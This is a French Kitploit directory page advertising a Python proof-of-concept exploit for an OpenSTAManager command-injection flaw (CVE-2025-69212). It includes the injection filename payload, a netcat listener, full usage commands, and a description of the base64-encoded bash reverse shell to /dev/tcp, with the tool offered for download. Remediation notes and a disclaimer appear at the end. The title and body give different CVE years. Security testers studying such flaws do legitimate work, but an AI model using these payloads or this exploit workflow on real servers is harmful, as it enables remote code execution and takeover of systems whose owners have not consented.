Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-69212 — Python poc, exploit for CVE-2025-69212 | Kitploit
Outils/GitHubGitHub/c0gnit00/cve-2026-69212
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubc0gnit00/cve-2026-69212

CVE-2026-69212

Python poc, exploit for CVE-2025-69212

Voir le dépôt
2il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-69212 — Injection de commandes OS dans OpenSTAManager (RCE)

Preuve de concept d'exploitation pour CVE-2025-69212, une vulnérabilité d'injection de commandes OS dans OpenSTAManager <= 2.9.8 qui permet à un attaquant authentifié d'exécuter du code à distance via un fichier ZIP malveillant téléversé.

Avis

  • CVE : CVE-2025-69212
  • GHSA : GHSA-25fp-8w8p-mx36
  • Versions affectées : OpenSTAManager <= 2.9.8
  • Corrigé dans : OpenSTAManager 2.9.9+
  • CVSS : Critique

Détails de la vulnérabilité

La vulnérabilité se trouve dans src/Util/XML.php à la ligne ~100, où l'application transmet un nom de fichier contrôlé par l'utilisateur directement dans un appel shell exec() sans assainissement :

root@kitploit:~
exec('openssl smime -verify -noverify -in "' . $file . '" -inform DER -out "' . $output_file . '"');

Lorsqu'une archive ZIP est téléversée via le plugin importFE_ZIP (/actions.php), l'application extrait le ZIP et transmet le nom de fichier de chaque entrée .p7m dans exec(). Un attaquant peut créer un ZIP avec un nom de fichier malveillant qui s'échappe de l'argument entre guillemets et injecte des commandes shell arbitraires.

Charge utile d'injection (nom de fichier) :

root@kitploit:~
invoice.p7m";<COMMANDE>;echo ".p7m

Exécution shell résultante :

root@kitploit:~
openssl smime ... -in "invoice.p7m";<COMMANDE>;echo ".p7m" ...
#                                   ^^^^^^^^^^^^ injecté ici

Remarque : La barre oblique / ne peut pas apparaître directement dans le nom de fichier car ZipArchive::extractTo() la traite comme un séparateur de chemin. Le PoC évite cela en encodant en base64 la charge utile du reverse shell.


Prérequis

  • Python 3.x
  • Bibliothèque requests
  • Identifiants OpenSTAManager valides (tout rôle ayant accès au plugin d'importation)
  • Un écouteur sur la machine de l'attaquant (ex. nc)

Installer les dépendances :

root@kitploit:~
pip install requests

Utilisation

root@kitploit:~
python3 CVE-2025-69212.py -u <URL_CIBLE> -U <NOM_UTILISATEUR> -P <MOT_DE_PASSE> --lhost <VOTRE_IP> --lport <VOTRE_PORT>

Options

Exemple

root@kitploit:~
# Démarrer l'écouteur
nc -lvnp 4444

# Exécuter l'exploit
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444

# Router via Burp Suite
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080

Fonctionnement

  1. Authentification — Connexion à OpenSTAManager avec les identifiants fournis
  2. Construction de la charge utile — Création d'une archive ZIP contenant un fichier .p7m dont le nom de fichier inclut la commande injectée
  3. Encodage base64 — Le reverse shell (bash -i >& /dev/tcp/LHOST/LPORT 0>&1) est encodé en base64 pour éviter les barres obliques dans le nom de fichier
  4. Téléversement — Envoi du ZIP en POST vers /actions.php via le plugin importFE_ZIP
  5. Exécution — Le serveur extrait le ZIP, transmet le nom de fichier malveillant à exec(), déclenchant le reverse shell
  6. Multithreading — Le téléversement s'exécute dans un thread démon car bash maintient la connexion HTTP ouverte ; le script se termine proprement sans attendre de réponse

Correction

Mettez à jour vers OpenSTAManager 2.9.9 ou ultérieur, qui assainit les noms de fichiers avant de les passer aux commandes shell.

Si le correctif immédiat n'est pas possible, désactivez le plugin importFE_ZIP ou restreignez l'accès à /actions.php aux seuls utilisateurs de confiance.


Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite. Toute utilisation non autorisée sur des systèmes que vous ne possédez pas est illégale et contraire à l'éthique. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil.


Références

  • GHSA-25fp-8w8p-mx36
  • OpenSTAManager GitHub
  • NVD - CVE-2025-69212
Télécharger l’outil
ArgumentRequisDescription
-u, --urlOuiURL de base de la cible (ex. http://target.htb)
-U, --usernameOuiNom d'utilisateur OpenSTAManager
-P, --passwordOuiMot de passe OpenSTAManager
--lhostOuiVotre adresse IP pour le reverse shell
--lportOuiVotre port d'écoute pour le reverse shell
--proxyNonProxy HTTP (ex. http://127.0.0.1:8080)